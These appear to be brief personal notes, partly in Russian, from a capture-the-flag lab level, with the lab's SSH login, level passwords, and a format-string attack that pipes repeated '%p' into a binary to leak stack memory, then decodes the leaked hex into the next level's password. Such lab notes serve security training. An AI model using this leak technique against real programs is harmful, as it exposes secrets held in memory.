ssh  level00@192.168.56.102 -p 4242
password:level00

su level02
PwBLgNa8p8MTKW57S7zxVAQCxnCpV8JqTTs9XEBv

0x70 - 0xa0 = 0x30 = 48

python -c ('print "%p" * 40') | ./level02

0x756e505234376848 0x45414a3561733951 0x377a7143574e6758 0x354a35686e475873 0x48336750664b394d

в консоли VScode sh password.sh

0x756e505234376848 -> Hh74RPnu
0x45414a3561733951 -> Q9sa5JAE
0x377a7143574e6758 -> XgNWCqz7
0x354a35686e475873 -> sXGnh5J5
0x48336750664b394d -> M9KfPg3H
Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H

su level03

Hh74RPnuQ9sa5JAEXgNWCqz7sXGnh5J5M9KfPg3H